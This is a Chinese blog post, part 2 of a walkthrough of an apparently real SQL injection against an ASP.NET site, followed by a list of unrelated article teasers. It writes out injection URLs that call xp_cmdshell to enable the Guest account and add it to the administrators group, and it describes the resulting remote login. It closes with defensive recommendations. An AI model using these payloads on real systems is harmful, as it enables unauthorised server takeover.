典型的 SQL 注入过程(2)
作者:手气不错 来源:Gracecode.com 发布时间:2009-11-19 13:02:00
标签:注入,sql,漏洞,服务器
提权
解禁 Guest 用户
http://foo/rss.aspx?keyword=lucky'));exec%09Master..xp_CMDShell%09'net%09user%09guest%09/active:yes';--
相当于服务器执行
net user guest /active:yes
再将 Guest 加入到管理员组
http://foo/rss.aspx?keyword=lucky'));exec%09Master.xp_CMDShell%09'net%09localgroup%09administrators%09guest%09/add';--
相当于服务器执行
net localgroup administrators guest /add
上述请求顺利执行成功,然后打开目标主机的远程登录,输入用户名“guest”密码为空登录,结果顺利登录 (运气和相貌都很重要 :P)。
重新关上 Guest 帐户,并通知主机管理员,至此攻击结束。
后记
正如上文所描述的,SQL 漏洞危害非常的巨大,但我相信国内很多中小站点还普遍存在着这样的漏洞。这里有些个人的不完全建议
代码要对输入的参数做到充分的过滤,并尽可能得考虑极端情况
错误信息尽可能的少,否则无关的人看不懂而有心的人就会提起兴趣
不要以管理员的身份运行服务器进程
某些情况下,net 命令对于攻击者而言就是“微软牌”的木马
严格控制远程登录访问者的来源
如果可能的情况下,不是很推荐使用 Windows 作为服务器操作系统
-- EOF --


猜你喜欢
- 作为一款流行的做图软件,美图秀秀已经能够完美的支持Windows7系统了。想必不少用户已经在Windows7系统下使用这款软件了吧。然而,在
- 一直以来,都不是很愿意在Blog上谈及自己的工作,因为不愿意太过于评论一些事情,毕竟做事情做好才是第一位的,简单的说三道四是没有用处。但是现
- 在“ * ”事件发生后,阿娇在发表了道歉声明之后,阿娇的一句“很傻很天真”迅速成为网络流行语。继上次恶搞“很黄很暴力”后又一句网络流行语。阿
- 因为经历过两个网站交易,深感买方与卖方博弈的心里。个人站长做一个站不容易希望能给他们一些借鉴,当然仅仅是个人观点。卖站者与买站者永远是个博弈
- 概述本模块集中说明在您的环境中强化 IIS 服务器所需的指导和步骤。为了向组织的公司 Intranet 中的 Web 服务器和应用程序提供全
- 在广告模式还未成熟的情况下,虚拟礼物会成为挽救社交网站的一线希望吗?最近,最为互联网业界津津乐道的一件事莫过于美国知名社交网站Faceboo
- “焦点间谍”木马家族最新成员TrojanSpy.Pophot.clh“焦点间谍”变种clh为牟取暴利篡改用户浏览器首页,赚取超高流量。Tro
- 电子商务如今风靡国内各个行业,不仅在沿海地区迅猛发展,湖南的电子商务也在高速发展中,逐步形成了一支电子商务湘军,为了帮助电子商务湘军更好的发
- 不知道为啥,我的IIS访问asp就这样了。------------------------------------Server Applic
- 打开:admin/superdel.php 找到一下代码(505行):Copy codeInitGP(array('delid
- 据pcadvisor网站报道,当谈到高科技产品的时候,我们经常会说“其结果是如何……”。但在某些情况下,计算机产品就像美国名将麦克阿瑟的名言
- 究竟什么是邮件服务器呢?邮件服务器提供了邮件系统的基本结构,包括邮件传输、邮件分发、邮件存储等功能,以确保邮件能够发送到Internet网络
- 一、安装前的准备1、下载好Ubuntu20.04的镜像文件,直接从官网下载就好,2、准备好VMware软件,这里就忽略安装过程了。二、建立虚
- 基本介绍POIpache POI是用Java编写的免费开源的跨平台的Java API,Apache POI提供API给Java程序对Micr
- 阿里妈妈是一个广告交易平台,但我觉得它更象是一个广告跳蚤市场。截止我写这篇博客为止,阿里妈妈已经拥有9503个站点的14542个广告位了,这
- 又读了一遍这个 PPT: Federation at Flickr: Doing Billions of Queries Per Day ,
- WordPress系统本身,默认安装的情况下使用默认模板,实际上对搜索引擎并不友好,并没有针对搜索引擎进行很好的设计,下面我介绍一些方法可以
- 下载的地址:http://java.sun.com/products/archive/j2se/1.4.2_06/index.html 第一
- 比如一个目录下有1,2,3,4,5这五个文件,现在我需要删除除了2以外的所有文件,那么我可以使用find . ! -name 2 -exec
- 对Mesos和Marathon的安装官方文档有较详细的安装说明,但是英文的。我参照官方安装文档(https://open.mesospher